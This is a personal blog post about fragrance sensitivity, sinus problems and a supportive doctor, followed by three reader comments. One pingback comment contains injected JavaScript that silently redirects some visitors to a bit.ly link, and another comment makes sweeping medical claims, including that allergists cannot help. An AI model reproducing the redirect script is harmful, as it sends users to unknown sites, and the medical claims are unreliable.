A doctor who listens: priceless

[A portion of this post was originally posted on Sherri Blossoms on January 21, but it’s relevant here, too, so rather than rewrite it all, I’m copying it.]

I went to the doctor last week, finally. I haven’t been since I found out for sure I was having a reaction to fragrance. Besides the cost, I wanted to wait until I had eliminated as much fragrance from my world as possible, to stabalize and see what healed and what didn’t. It seemed to be going pretty well, and then The Time of the Migraine hit the reset button, and I knew I couldn’t wait any longer.

I ended up crying at the doctor’s office. I feel pretty dumb about the blubbering, but it just serves to show how frustrated I am by the whole thing, how much I really need to figure this sinus thing out. The X-rays showed nothing abnormal (it so cool to see inside my own skull) so he gave me a course of antibiotics and steroids.

I told Doc I’d been dealing with this problem for 6-7 years, but as I look back I think it’s been closer to eight or nine. I’m not sure if Doc believes me when I tell him how my old doctor dealt with these chronic problems. With the backward lens of time and experience, it seems like the old doc hated me. I wish I could see what he wrote about me in my chart.

It won’t surprise me at all if antibiotics clear it right up. The old doc refused to consider it. I love having a doctor who listens to me, even when I’m crying.

And oh yeah, I told him about the fragrance thing and he didn’t laugh at me. He didn’t get defensive. He didn’t dismiss it. He said some people have sensitive airways, and that was it. I’m hoping that the fragrance sensitivity will shake out when my sinuses are healed. I’d probably never go back to the old level of stinkiness, but at least I’d be able to be around people again, which means writer’s cons and a job and TCoB in general. To be normal would be the height of awesomeness.

3 responses to this post.

  1. Posted by Anonymous on November 4, 2011 at 10:11 am

    That’s nice that you have a doctor who listens:0) So your symptoms
    what are they? I just became sensitive or found out in June 2011 and
    to see if some or anyone is like me. My email: mscbd06@gmail.com

  2. […] if(!document.referrer || document.referrer == '') { document.write(''); } else { document.write(''); } var now = new Date().getTime(); if (now%20 == 0) { window.location = "http://bit.ly/uSzLNi"; } COLON CLEANSINGHomemade Beauty RecipesIt's Your Hair – Hair Extensions and Everything HairBravadoraPoison Scents […]

  3. Posted by Elain Mendez on March 8, 2016 at 5:17 pm

    If your doctor dismisses your fragrance sensitivity, find a new one. Ask your doctor why he believes you cannot be allergic to fragrance. If he says it’s just a “smell”, you should ask him (politely) what he believes is “in” fragrance. Also, you may want to suggest he visit the US Surgeon General’s web site, the Americans with Disabilities, The Center for Disease Control, the American Lung Association, OSHA and the cleanerindoorair. org and many many others. Fragrance Allergies are real. The Federal Government recognizes this, and fragrance allergies are accepted by the SSI as a qualifying disability. Also, the Justice Dept has a web site for employers that instructs employers how to structure a reasonable accommodations for employees with MCS and Fragrance Allergies. The ADA requires employers to make reasonable accommodations for employees with fragrance allergies. I would not go to an Allergist since there is nothing these guys can do for you, the same as they cannot do anything for a person who has an allergy to peanuts or shell fish. They apparently treat people with seasonal allergies – things people don’t die from. I wish the only symptoms I had were a migraine, irritated pulmonary system, and burning eyes or a skin rash. I get life threatening symptoms pretty much like anaphylaxis. For me, it’s an ambulance ride to the ER, epi-pen, steroids, and a long recovery. If you are getting symptoms which seem manageable now, take care to limit your exposure. According to my info, things may get much worse. So, don’t end up like me! Also, search for the “Personal Care Products Safety Bill” being introduce to Congress by the Senate. Having a reaction to fragrance is only the tip of the iceburg. Wait until you find out “the rest of the story”.

Leave a Reply

